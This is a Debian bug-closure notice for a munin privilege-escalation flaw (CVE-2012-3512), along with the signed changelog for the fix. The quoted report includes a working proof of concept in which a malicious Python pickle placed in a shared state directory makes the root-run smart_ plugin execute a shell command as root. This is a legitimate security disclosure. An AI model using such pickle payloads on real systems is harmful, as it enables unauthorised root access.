Bug#684075: marked as done (munin: insecure state file handling, munin->root)

Thu, 30 Aug 2012 01:51:24 -0700 

Your message dated Thu, 30 Aug 2012 08:48:19 +0000
with message-id <e1t70qf-0002bu...@franck.debian.org>
and subject line Bug#684075: fixed in munin 2.0.6~git-1
has caused the Debian Bug report #684075,
regarding munin: insecure state file handling, munin->root
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
684075: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684075
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Package: munin-plugins-core
Version: 1.4.5-3
Severity: grave
Tags: upstream security
X-Debbugs-CC: hel...@subdivi.de

Hello, copying kenyon's report from
http://www.munin-monitoring.org/ticket/1234 :



Currently, plugins which run as root mix their state files in the same
directory as non-root plugins. The state directory is owned by
munin:munin and is group-writable. Because of these facts, it is
possible for an attacker who operates as user munin to cause a
root-run plugin to run arbitrary code as root.

A proof-of-concept example is the smart_ plugin. It must run as root
to access disk SMART data. It also stores state in Python pickle
format, which can store executable Python code. Example follows:



# su -s /bin/sh -c /bin/sh munin
$ cd /var/lib/munin/plugin-state
$ mv smart-sda.state smart-sda.state.orig
$ cat bla.py
import pickle
import subprocess
import sys

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh', '-c', 'id > /tmp/whoami'),))

pickle.dump(RunBinSh(), sys.stdout)
$ python bla.py > smart-sda.state
# wait for node to run smart_ plugin
$ cat /tmp/whoami
uid=0(root) gid=110(munin) groups=0(root),110(munin)



A possible solution is to have a directory dedicated to each plugin,
especially plugins which may run with superuser privileges, so that
less-privileged users cannot modify their state files. This cannot be
enforced by munin on all plugins, but this can be enforced by munin
developers for plugins shipped with the munin package. We should
consider making it easy for plugin writers to do this, maybe by making
the perl/bourne shell/other language munin plugin API use a dedicated
plugin state directory for each plugin. Otherwise, a plugin could be
hardcoded to create and use a subdirectory of the existing
plugin-state directory.

Thanks to "cnu" on the munin IRC channel for raising this issue and
providing the smart_ example.

--- End Message ---
--- Begin Message --- 
Source: munin
Source-Version: 2.0.6~git-1

We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Holger Levsen <hol...@debian.org> (supplier of updated munin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 30 Aug 2012 08:26:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java 
munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6~git-1
Distribution: experimental
Urgency: low
Maintainer: Munin Debian Maintainers <packag...@munin-monitoring.org>
Changed-By: Holger Levsen <hol...@debian.org>
Description: 
 munin      - network-wide graphing framework (grapher/gatherer)
 munin-async - network-wide graphing framework (async master/client)
 munin-common - network-wide graphing framework (common)
 munin-doc  - network-wide graphing framework (documentation)
 munin-node - network-wide graphing framework (node)
 munin-plugins-core - network-wide graphing framework (plugins for node)
 munin-plugins-extra - network-wide graphing framework (user contributed 
plugins for nod
 munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes: 
 munin (2.0.6~git-1) experimental; urgency=low
 .
   * 2.0.6 is actually unreleased still, this is based on the current git
     commit 6183662. The following fixes are included:
     - munin-node: more secure state file handling, introducing a new plugin
       state directory root, owned by uid 0. Then each plugin runs in its own
       UID plugin state directory, owned by the said UID. (Closes: #684075),
       (Closes: #679897), closes CVE-2012-3512.
     - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
       thanks to Helmut Grohne <hel...@subdivi.de>
     - munin-cron: call munin-graph with --cron argument (Closes: #685343)
     - Master/Node.pm: fix _node_read_fast() to accept all valid returns
       (Closes: #686089) and _do_connect() to not use an uninitialized
       variable. (Closes: #686090)
     - munin-async: make spoolread less restrictive about (valid) plugin names
       (Closes: #686093)
   * Update Location and Scriptalias in shipped apache.conf to reflect changes
     introduced upstream in 64dfec73 coming in 2.0.6. This fixes a regression
     introduced in fixing #682869.
Checksums-Sha1: 
 87f92bd652589be479511fd928f17ca9e62172ef 2129 munin_2.0.6~git-1.dsc
 e28fb8500f1363a905f2be164c3f0ec4780aca5c 1422644 munin_2.0.6~git-1.tar.gz
 495b3c699c5db9706db03d9d2eeab149a3d8c113 126252 munin-node_2.0.6~git-1_all.deb
 76a3d3fcd400f5221ba5d7424c30e0b5339b9b43 302894 
munin-plugins-core_2.0.6~git-1_all.deb
 dc01c511e671c0a677dfc6cf7fec360077934e6f 152910 
munin-plugins-extra_2.0.6~git-1_all.deb
 71b1c478d9a7abd4d901d954ab52f6d84479559a 145808 
munin-plugins-java_2.0.6~git-1_all.deb
 6d24d5033c9387d8e8f3910373646b74c74cbf13 200446 munin_2.0.6~git-1_all.deb
 5954e9803442dbd4fe7f24adbd0b1bc9fc6a7c1b 93692 munin-common_2.0.6~git-1_all.deb
 acf0ac69dd6e51a091bb55699f1ba7ccd32e5efb 81604 munin-async_2.0.6~git-1_all.deb
 1fe472bce2797dd2929955e7101a70f0e5283e2a 210798 munin-doc_2.0.6~git-1_all.deb
Checksums-Sha256: 
 e788a52a42e577702b03df2a76b902ecfb75d7d554bab56ab218a96857ceb1d4 2129 
munin_2.0.6~git-1.dsc
 2fba10446f70b872d7fd0c2aef3e6d7fd6d19363a98228d8079d16be1c431943 1422644 
munin_2.0.6~git-1.tar.gz
 c5e3df113333b5fb286c943ef1e252f9caa981c83c5ac47d24a77e6fdb3cb058 126252 
munin-node_2.0.6~git-1_all.deb
 8adfd149197072b108d26ea402393cc40b203c652bee10b3e67c56da9a75744e 302894 
munin-plugins-core_2.0.6~git-1_all.deb
 343093da2cdca0dfe21d32c8ea2b4f14e9c1b6e202fea45b10f68bea4f85690f 152910 
munin-plugins-extra_2.0.6~git-1_all.deb
 50d926265834e95a642617a575d8fc29c6bec0ca4e97b914da26135526cd3ee0 145808 
munin-plugins-java_2.0.6~git-1_all.deb
 7b8fa95370adb1eaff00091d99a3543ab6b62850f7d09e873b8a375c4fc81d52 200446 
munin_2.0.6~git-1_all.deb
 e8e501fc937dbd964b2e8092385e15b4edf99dd26307e28e79b245c092d714f6 93692 
munin-common_2.0.6~git-1_all.deb
 3fb62447d4df6d00b89de1be7acac538bcd1dafddcef92217e97aacfa9dbe094 81604 
munin-async_2.0.6~git-1_all.deb
 f7d126effa2b2924a5964fa09b427d3dad62195c2e15c3a7254ccb767e91ad33 210798 
munin-doc_2.0.6~git-1_all.deb
Files: 
 cb7b1f41569d38be6104d578543c637a 2129 net optional munin_2.0.6~git-1.dsc
 61aa2c32d0a415d7e14d424cf771bbb1 1422644 net optional munin_2.0.6~git-1.tar.gz
 55c3fa84967745332b796b21249fa85a 126252 net optional 
munin-node_2.0.6~git-1_all.deb
 3b271a0f6b4746bbe1e0fc5eea4ca72f 302894 net optional 
munin-plugins-core_2.0.6~git-1_all.deb
 d39bfbb398a5c30e1ce985ca87e703d3 152910 net optional 
munin-plugins-extra_2.0.6~git-1_all.deb
 26fe11792149f134c3cf34988c528006 145808 net optional 
munin-plugins-java_2.0.6~git-1_all.deb
 349a40dc4c3bbdcd0640fca8e2936ac9 200446 net optional munin_2.0.6~git-1_all.deb
 a86b0f6d30e1a94610fca9ef491e49fe 93692 net optional 
munin-common_2.0.6~git-1_all.deb
 c0a03eb040ff1a0e098b9287f0ea4230 81604 net optional 
munin-async_2.0.6~git-1_all.deb
 3076757e3fe6a060197ee96b55473490 210798 doc optional 
munin-doc_2.0.6~git-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQIVAwUBUD8lvgkauFYGmqocAQgfxQ//egaDsjnxdDGxqTJ7gp552WnGGP9Ws9Lr
Bnirdgknb+zeIpVkLBe1bSgiFToKIAl/xaIMe9gzk8tiksSnpr634f79t5mmoqLb
P8ljp5H3fp+fNDjtrbGVv2QzUXn/B+NE8edgqR20LU7XXwoGvG/JVK4nFvElNCmh
NZBy/2Xge1W7PbT3mCqZj1mYMhJhXt/yUjA7vFrJyGfwM36Xry4MRqhYj+wFEeXN
iiT3dxJ77hupp7Lch1Iq2UylGU6mb9GgOSnXEqfQBhnaFDH/79Yfv6Yd1JBGgHlc
JgkrrzhoxwtI07W0QVyK4epUkl6SCQfVBQXnXd8lhyLZH4xOctQbiTYHg7Xb4ea2
Fik+37ePyB2epOxTrFNPEv2PcyinnutCNY3DITZk+eqBlS8/e9cYfigLmUkwCo9J
FrePyPAofQj4+k3EtesLN4/Ss0GrOqEJ+UUOSsj1ini7fHDjZ6FPo5Pr2FG7oSQI
SJNVWiczYIC6AKH9XqfFznuTmEHcI5MZKjfUeRbbaXzuEgdJHlNpqQ6aiVcfVZOK
I8YW5P4hontOTRFCgkZK2F3GYj4OD8SlPCOM39zNwoeCBGsbdW8N3VuQ8x8xahN2
V19KUC7JUTLPNr5HglQOHQoA7boUjEi6y+dJ3S3al92JppMxvBPnZpsClVNNc1Y7
t68o1Uwiu0Q=
=XPYG
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to